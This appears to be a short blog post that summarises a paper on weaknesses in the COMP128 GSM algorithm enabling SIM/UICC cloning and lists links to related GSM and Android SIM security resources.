This paper, “A3/A8 & COMP128” describes SIM attacks and UICC cloning: http://www.tcs.hut.fi/Studies/T-79.514/slides/S5.Brumley-comp128.pdf
Several interesting points are made: 1. Defects in the algorithm, and deliberate weakening of the encryption strength, make it much easier than expected to derive the private key stored on the UICC. 2. Exploits require physical access to the UICC. Early exploits required about 6 hours to derive the private key, which enables the attacker to clone the UICC. Later, more sophisticated attacks were developed that reduced the attack time to 16 minutes, and then less than 2 seconds.
Here’s a list of GSM security projects and papers that caught my eye:
Using the SIM Card as a Secure Element in Android: http://nelenkov.blogspot.com/2013/09/using-sim-card-as-secure-element.html
GSM Security Algorithms: http://www.gsma.com/technicalprojects/fraud-security/security-algorithms
Android Telephony Manager, and access to SIM/UICC: http://developer.android.com/reference/android/telephony/TelephonyManager.html#iccExchangeSimIO%28int,%20int,%20int,%20int,%20int,%20java.lang.String%29
Osmo SIM Auth, running SIM authentication from Python: http://openbsc.osmocom.org/trac/wiki/osmo-sim-auth